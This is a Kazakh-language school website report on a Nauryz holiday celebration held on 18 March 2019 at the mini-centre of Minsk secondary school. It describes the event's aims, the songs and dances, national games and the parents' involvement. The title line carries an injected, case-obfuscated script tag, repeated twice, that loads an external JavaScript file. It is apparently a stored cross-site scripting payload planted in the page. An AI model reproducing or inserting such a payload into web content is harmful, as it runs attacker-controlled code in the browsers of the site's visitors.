Минск орта мектебі жанындағы шағын орталықтың наурыз мерекелік іс-шараның өткізілуі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.03.2019

Минск орта мектебі  жанындағы шағын орталықтың    наурыз мерекелік  іс-шараның өткізілу есебі

                                                   2018-2019 жылы

            Минск орта мектебі жанындағы шағын орталықта 22- наурыз Ұлыстың ұлы күні мерекесі орай 18 наурыз күні   «Қош келдің,Әз Наурыз» атты мерекелік  ертеңгілік өткізілді.

Тақырыбы:Қош келдің,Әз Наурыз!

Мақсаты: Наурыз айы жыл басы саналатындықтан сәбилер санасына жеткізу. 22 наурыз  күн мен түннің теңелетіндігін,одан кейінгі күндері күннің ұзарып,күннің қысқаратындығын айтып түсіндіру.Балаларға Наурыз мерекесіне қалай атап өтетіндігін таныстыру. Ұлттық салт-дәстүрлері құрметтеп,оларды мақтан етуге тәрбиелеу.Мерекелік іс шара мектеп директоры Хадыр Мұратбектің  сөз кезегімен басталды   бүлдіршіндердің орындауында «Наурыз той» әнмен ашып және наурызға арналған тақпақтарын оқыды. қыздарымыз «қамажай» атты билерін билесе, ұлдар тобы«көкпар» биін биледі. Бұл іс-шараға барлық ата-аналар белсенділік танытты  және де барлық балаларда қуана қатысты. Ата-аналар арасында ұлттық салт-дәстүрлер мен мақал- мәтел сайысы өтті.Ұлттық ойындар  «Күш сынасу», «Арқан тарту» ойындары көптің көңілінен шықты. Ата-аналар арасында салт дәстүрге байланысты  «Тұсау кесер» және Май бауыр дәстүрі өткізілді. Меркелік іс шара көңілді де қызықты болды. Ата-аналар бүлдіршіндерінің өнеріне ризашылығын  білдіріп , өз лебіздерін білдірді.

Өткізген тәрбиеші: Аманкелди В

Өткізген күні: 18.03.2019 жыл.

 

Просмотров: 1311


Пікір қосу



Деректерді қолтаңбаға қосу